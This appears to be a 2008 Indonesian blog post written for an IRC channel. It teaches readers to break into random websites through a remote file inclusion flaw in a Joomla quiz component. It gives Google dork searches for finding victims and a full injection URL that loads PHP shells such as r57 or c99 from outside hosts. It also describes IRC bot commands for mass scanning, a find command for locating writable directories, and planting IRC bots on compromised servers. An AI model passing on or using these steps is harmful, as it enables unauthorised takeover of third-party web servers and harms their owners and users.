Alo bro, para dekater`s ( penghuni room #tamiang irc.almarhum.net ) pa kabar kalian ?? moga - moga baek dan selalu dalam lindungan Tuhan, amien. Ok boss, tanpa basa - basi kita langsung aja meluncur ke TKP. Kali ini kita coba untuk mengulas cara sederhana untuk me- Inject Web ato dalam basa bule nya Steal Webhosting ( Tukang Maling Cd/ Jemuran Orang ) gitu kali ya kalo di indonesiakan wakakaka
* Persiapkan Browser " Mozilla Firefox " kalo g ada kalian bisa donlot ( wajib pake
browser ini karena Inject Web ga akan jalan kalo pake browser selain Mozilla,
alasan yang masuk akal kan ??
* Buka situs http://milw0rm.com/
* klik "web apps" atau search dengan ketik File Include / File Inclusion
vulnerability / Include Vulnerabilities"
* Misal kita buka http://www.milw0rm.com/exploits/5345
* Disitu ada tulisan [o] Exploit http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[evilcode] berarti software tersebut adalah joomla onlineflashquiz yamg memiliki vuln pada "component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=" dan [evilcode] yang dimaksud adalah scripts setan shells php,kamu bisa pake scripts kamu sendiri atau cari di mbah google.
* buka Mbah Google memakai mozilla firefox,lalu ketik di kolom search "inurl:option,com_onlineflashquiz"
* akan muncul daftar nama2 situs yang memakai software joomla onlineflashquiz yaitu "com_onlineflashquiz"
* ambilah salah satu dari sebuah situs tersebut nama webnya aja. misalnya http://grandong.com/index.php?option=com_onlineflashquiz&task=1 ambilah nama web domainnnya aja menjadi http://grandong.com/
* lalu buka browser baru dan kopi paste web tadi
* sambungkan dengan software yang vuln diatas sehingga menjadi http://grandong.com/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=
* sambungkan lagi dengan scripts shell kamu,terserah pake r57,c99 atau shells setan. Misalnya alamat scripts setan kamu "http://ibliz.net/scripts/setan.txt"
* sehingga web diatas bisa diinjek melalui browser mozilla firefox dengan alamat lengkapnya
"http://school.my.jp/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://ripway.com/scripts/r57.txt??"
Mengapa memakai tanda ? disetiap akhiran,karena itu bertujuan agar lebih safe aja,gak usah pake tanda ? juga gak apa kok.
* Kalo gak pingin capek2 cari injekan,kamu bisa join di channel MIRC/IRC yang mempunyai bot scan
* jadi kita tinggal scan sambil chatingan,biar bot scan aja yang mencari injekan kita ( mudah bukan ? )
* cara pake bot scan biasanya pake perintah !scan [vuln] [dork] atau `scan [vuln] [dork]
* [vuln] adalah path injekan diatas "component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir="
[dork] adalah kata kunci untuk mencari pada situs "inurl:com_onlineflashquiz"
* jadi kita scan pake perintah !scan component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir= inurl:com_onlineflashquiz
* Kalo kamu sudah mendapatkan target, cari direktory yang tidak permision denied / direktory yang bisa di upload dengan mengetik " find / -type d -perm 777 "
* kamu bisa bikin eggdrop ato psy disitu ( kalo shell nya support ) cara bikinnya liat arcive di blog ini pada bulan februari di situ kita bahas mengenai ini.
Sekian dulu sedikit informasi dari saya semoga bermanfaat.
Contoh BOT Scan bisa Download DISINI
Saturday, September 13, 2008
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment